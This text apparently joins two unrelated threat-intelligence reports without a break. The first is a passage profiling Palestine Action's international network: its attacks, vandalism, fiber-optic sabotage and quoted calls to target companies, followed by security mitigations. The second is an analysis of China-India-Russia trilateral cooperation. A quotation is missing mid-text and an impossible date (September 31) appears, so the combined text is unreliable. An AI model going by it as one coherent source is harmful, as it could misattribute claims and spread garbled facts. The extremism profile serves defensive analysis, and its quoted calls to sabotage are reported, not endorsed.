• On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including obstructing a runway at Pisa International Airport, occupying several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.
• On September 29, 2025, the group claimed to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.
• On September 25, 2025, several of the group’s activists chained themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”

Affiliate: Death to Toll (Australia)

Figure 8: Death to Toll logo (Source: Instagram)

“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.

The first attack claimed by this group was a sabotage of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an obstruction of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers cited Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.

In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:

• On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.
• On August 31, 2025, AVEs claimed to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.
• On August 11, 2025, AVEs claimed to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll confirmed the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.

Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”

Offshoot: Unity of Fields (United States)

Figure 9: Unity of Fields logo (Source: Social Media)

Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.

UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with insight from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.

From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto leaders between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US attack on an Elbit facility in Merrimack.

In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.

Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:

• An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia
• A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California
• A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building

UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh reported on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she participated in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.

Partner: Shut the System (United Kingdom)

Figure 10: Shut the System logo (Source: Social Media)

Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely emerged as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.

The first reported Shut the System operation took place in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 communiqué, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 article from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action conducted a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.

Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:

• On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.
• On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”
• On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company responsible for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.

From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.

Mitigations

The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&W) of planned activities.

To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.

• Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.
• Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.
• Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.
• Review and, where necessary, implement governmental guidelines for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.
• Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.
• Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.

Outlook

While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.

Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.

Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.

Executive Summary

Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.

United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.

The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).

However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.

Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.

Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.

Key Findings

• The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.
• However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.
• The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.
• An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.
• Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.

Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia

We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.

India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– necessitates looking for alternative markets and deepening foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including cultivating its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs called the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically highlighted the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s increasing oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly monitoring the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely repair, the deteriorating diplomatic and economic ties between India and the US.

The US tariffs have likely also reinforced an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.

Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi stated that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin (Figure 1) at the SCO Summit sparked concerns over an emergent Russia-India-China troika.

Figure 1: Photo posted by Modi of himself with Putin and Xi at the SCO Summit

on August 31, 2025 (Source: Social Media)

The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.

Areas of Bilateral Intersection and Divergence Among China, India, and Russia

Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.

China’s Foreign Policy

China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” such as preserving the CCP’s political power, territorial integrity, and economic development, as well as China’s efforts to shape a “multipolar” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main perceived threat — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely considers India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.

India’s Foreign Policy

India almost certainly defines its relationships with China and Russia through its doctrine of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in founding the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic balancing act seeking to promote an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also underpinned by a “multi-alignment” policy, which very likely seeks to promote and safeguard India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has cultivated its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.

Russia’s Foreign Policy

Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:

Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most sanctioned state in the world.

China-Russia: Strategic Partners in Countering the West

In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.

Political Dynamics

Chinese and Russian leadership almost certainly see each other as primary strategic partners in advancing the “multipolar” world. In 2023, Xi said to Putin, “We are the ones driving” changes unseen in a century, and multiple joint statements have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the Global Governance Initiative, Global Security Initiative, and Global Development Initiative.

Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have met over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia declared a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.

Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has decreased by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade disruptions and sanctions (1, 2, 3). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, prefers a protracted conflict in Ukraine as it diverts the US’s focus away from China.

At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document prepared by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.

Economic Dynamics

Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade denominated in Chinese yuan.

China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially increased. On September 2, 2025, Russia and China signed a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China buys Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly cancelled orders of Russian oil imports following US sanctions in late October 2025.

In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of dual-use and military-relevant goods and expertise. As of mid-2025, dual-use exports to Russia likely have at least slightly decreased from their peak in 2024.

Overall trade between China and Russia has also grown significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly double that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border crossings –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also expanding, and China and Russia have announced deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).

There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to avoid overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began halting transactions with Russian customers, and at least one bank did so as recently as September 2025 after being sanctioned by the EU. In September 2024, China implemented a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.

Military Dynamics

Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more frequent and more complex, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to participate in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise involved a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber flight into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia conducted their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.

In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he stated that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further indicates that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”

Beyond military exercises, US officials have asserted as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government asserts that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is providing Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US sanctioned a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were working on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been involved in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.

Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.

Cooperation in Propaganda and Influence Operations

We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, including media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement stating that they would “jointly articulate a common stance in the global media space.”

China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) shows that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) spread narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely used a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.

Since approximately 2019, China has increasingly used computational propaganda and influence operation tactics likely learned by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently frame the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta banned Russian state media outlets from purchasing ads on its platforms, China Global TV Network placed at least 21 pro-Russia advertisements on Facebook in a single month.

China-India: Nascent Thaw of Longtime Tension-Filled Relationship

China-India relations have gone through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.

In recent months, China-India relations have likely returned to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely driven India to pursue improved ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” challenging years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, noted that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent rapprochement, significant hurdles and unresolved disagreements remain, making it less likely that China and India will form a long-term strategic partnership.

Political Dynamics

China’s approach to India is likely primarily driven by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to consolidate control over disputed border territories, leading to deadly skirmishes with India and cyberattacks against Indian critical infrastructure. India’s approach to China has likely been rooted in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.

